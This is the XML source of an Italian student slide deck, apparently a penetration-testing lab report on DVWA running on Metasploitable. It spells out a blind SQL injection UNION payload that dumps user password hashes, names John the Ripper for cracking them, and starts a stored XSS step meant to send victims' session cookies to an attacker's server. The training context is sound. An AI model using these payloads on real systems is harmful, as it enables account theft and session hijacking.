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78" r:id="rId2"/>
    <p:sldId id="279" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="294" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="298" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="299" r:id="rId12"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="13716000" cy="24384000"/>
  <p:defaultTextStyle>
    <a:defPPr rtl="0">
      <a:defRPr lang="it-IT"/>
    </a:defPPr>
    <a:lvl1pPr marL="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DF8C8C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7" d="100"/>
          <a:sy n="37" d="100"/>
        </p:scale>
        <p:origin x="41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247819D-F1CB-53B6-B1A3-051EEF8AE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0DDE6F-9299-B8DF-CCB3-2CA9E78A5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A2221-340C-4102-8331-69C7DD466B9E}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>04/11/2023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3DF9A0-78B3-B87B-E72F-87B083E9DC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423EA6-72C0-6381-6233-C9F564383D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2FFB-0891-454A-BBF6-17FC30BA47A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1103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it-IT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84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971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134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958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8549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01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86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588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063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63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magin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it-IT" sz="44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4" name="Segnaposto immagine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8" name="Segnaposto immagine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8" name="Segnaposto testo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8" name="Segnaposto testo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7" name="Segnaposto immagine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9" name="Segnaposto testo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9" name="Segnaposto tes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6" name="Segnaposto immagine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0" name="Segnaposto tes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0" name="Segnaposto tes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5" name="Segnaposto immagine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1" name="Segnaposto tes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it-IT">
                <a:solidFill>
                  <a:schemeClr val="accent6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30" name="Immagin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MMM AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto testo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MMM AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto testo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MMM AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Segnaposto testo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MMM AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto testo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MMM AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto testo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7" name="Segnaposto testo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8" name="Segnaposto testo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9" name="Segnaposto testo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0" name="Segnaposto testo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1" name="Immagin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3" name="Immagin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7" name="Immagin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9" name="Immagin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it-IT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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="12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it-IT"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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="12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46" name="Segnaposto testo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4" name="Segnaposto immagine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9" name="Segnaposto testo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6" name="Segnaposto immagine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0" name="Segnaposto testo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0" name="Segnaposto testo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5" name="Segnaposto immagine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9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61" name="Segnaposto testo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it-IT" sz="15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magin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5" name="Immagin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6" name="Immagin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3" name="Immagin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21" name="Immagin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magin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it-IT" b="1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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="it-IT" sz="15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Figura a mano libera: Forma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9" name="Immagin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it-IT" sz="44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magin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Immagin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15" name="Immagin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7" name="Immagin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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titolo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9" name="Segnaposto contenuto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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="12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0" name="Segnaposto contenuto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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="12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igura a mano libera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igura a mano libera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4" name="Immagin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it-IT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it-IT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it-IT" sz="1800"/>
            </a:lvl3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it-IT"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it-IT" b="1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it-IT" sz="1500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="it-IT" sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="it-IT" sz="15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6" name="Figura a mano libera: Forma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9" name="Figura a mano libera: Forma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it-IT" sz="4400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2400">
                <a:solidFill>
                  <a:schemeClr val="accent6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it-IT" sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="14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lvl="0" rtl="0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it-IT" sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="it-IT" sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="it-IT" sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="it-IT" sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="it-IT" sz="12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it-IT"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7" name="Segnaposto testo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it-IT" sz="10000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Segnaposto testo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/>
            </a:lvl1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6" name="Segnaposto testo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it-IT" sz="10000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Immagin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3" name="Figura a mano libera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33" name="Immagin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9" name="Figura a mano libera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31" name="Figura a mano libera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dirty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sz="45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3" name="Segnaposto immagine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2" name="Segnaposto tes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4" name="Segnaposto tes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6" name="Segnaposto immagine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7" name="Segnaposto tes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9" name="Segnaposto immagine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8" name="Segnaposto tes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0" name="Segnaposto tes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lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT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it-IT"/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0" name="Segnaposto immagine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5" name="Segnaposto testo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3" name="Segnaposto immagine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2" name="Segnaposto testo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4" name="Segnaposto testo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1" name="Segnaposto immagine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18" name="Segnaposto testo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6" name="Segnaposto immagine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27" name="Segnaposto testo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2" name="Segnaposto immagine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1" name="Segnaposto testo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29" name="Segnaposto immagine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28" name="Segnaposto testo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0" name="Segnaposto testo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13" name="Segnaposto immagine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it-IT" sz="14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it-IT"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33" name="Segnaposto testo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it-IT" sz="1200" spc="20" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT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it-IT"/>
              <a:t>Titolo presentazione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it-IT" smtClean="0"/>
              <a:pPr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it-IT"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it-IT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710" y="1984248"/>
            <a:ext cx="5922580" cy="12252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WEB APPLICATION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t>HACKING</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
            </a:b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3742" y="3395866"/>
            <a:ext cx="4424516" cy="972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br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Progetto Settimana 5 - Ivan Galati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t>10</a:t>
            </a:fld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9393AF-D629-0A5C-B676-C0A556143E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961534" y="1668544"/>
            <a:ext cx="63270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solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'esercizio di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Testing ci ha dimostrato la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>presenza di vulnerabilità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>significative di DVWA in esecuzione su Metasploitable con il livello di sicurezza impostato su "Low". </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Queste vulnerabilità consentono a un attaccante di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accedere a dati sensibili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> degli utenti e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie di sessione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, mettendo a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rischio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del server web e dell’applicazione in generale.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BEDF3EBA-3A83-B643-DA35-0EF0CEE8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407" y="210312"/>
            <a:ext cx="4385186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48E7EA36-8694-3A26-B3D5-9CB21375A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339" y="2408903"/>
            <a:ext cx="2651663" cy="1366684"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="7200" dirty="0"/>
              <a:t>FINE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53F762EA-49EE-D807-7967-8DB010EE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4768" y="3547183"/>
            <a:ext cx="1591155" cy="456807"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ivan Galati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293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4" y="436946"/>
            <a:ext cx="4655377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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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3" y="1492438"/>
            <a:ext cx="7241262" cy="461339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Exploitare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> le vulnerabilità «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» e «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» presenti su DVWA in esecuzione su Metasploitable.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Abbiamo due obiettivi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recuperare le password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> degli utenti presenti sul database (sfruttando la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recuperare i cookie di sessione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>delle vittime del XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ed inviarli ad un server sotto il controllo dell’attaccante.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846526"/>
            <a:ext cx="6400800" cy="135993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 Injection</a:t>
            </a:r>
            <a:b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blind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5715" y="4319506"/>
            <a:ext cx="6892413" cy="797593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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C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Recupero delle password degli utenti presenti sul DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93247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3493795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 err="1"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" cap="none" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> BLIND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220" y="1419465"/>
            <a:ext cx="5737780" cy="46876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1600" dirty="0"/>
              <a:t>Abbiamo avviato DVWA su Metasploitable ed impostato </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>il livello di sicurezza su «Low».  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Il nostro obiettivo era quello di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recuperare le password </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>degli utenti dal database utilizzando un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>A differenza di un attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> (che consente all'attaccante </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>ricevere un feedback se è presente o meno una vulnerabilità), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> Blind l'attaccante deve dedurre questa informazione senza un feedback in quanto non si viene reindirizzati ad una pagina di errore come nel caso precedente).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Utilizzando DVWA su Metasploitable, abbiamo notato che, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>nella tab Blind, tramite la query</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%' and 1=0 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null,concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>»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vengono</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>visualizzati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DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id utenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password in hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> presenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> database, sfrutteremo quindi questa vulnerabilità.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="160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t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT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964673D-F307-B740-678E-58F1599D3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2" y="1419465"/>
            <a:ext cx="5997677" cy="468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3493795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 err="1"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" cap="none" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> BLIND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425" y="2417966"/>
            <a:ext cx="5961496" cy="202206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1800" dirty="0"/>
              <a:t>Successivamente decifriamo i codici hash </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>delle password tramite tool (come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JohnTheRipper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decrypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> online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Sceglieremo una coppia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>user:password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>(in questo caso «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1337:charley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>») </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>ed utilizzeremo queste credenziali come test del successivo </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>che andremo ad eseguire.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5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82C1C0F-72EC-F980-B340-448963ED14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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538351" y="2656683"/>
            <a:ext cx="5199430" cy="15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5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39816"/>
            <a:ext cx="6400800" cy="67342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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="40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Stored</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="40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033869"/>
            <a:ext cx="6400800" cy="512064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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C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Recupero dei cookie di sessione delle vittime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57" y="210312"/>
            <a:ext cx="3887085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XSS STORED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91646"/>
            <a:ext cx="6096000" cy="510915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1800" dirty="0"/>
              <a:t>Ci spostiamo nella tab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>, dove andremo ad eseguire l’attacco.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Inizialmente andiamo a creare un server temporaneo dove visualizzeremo i cookie delle vittime. Per fare ciò utilizzeremo il comando «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phyton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
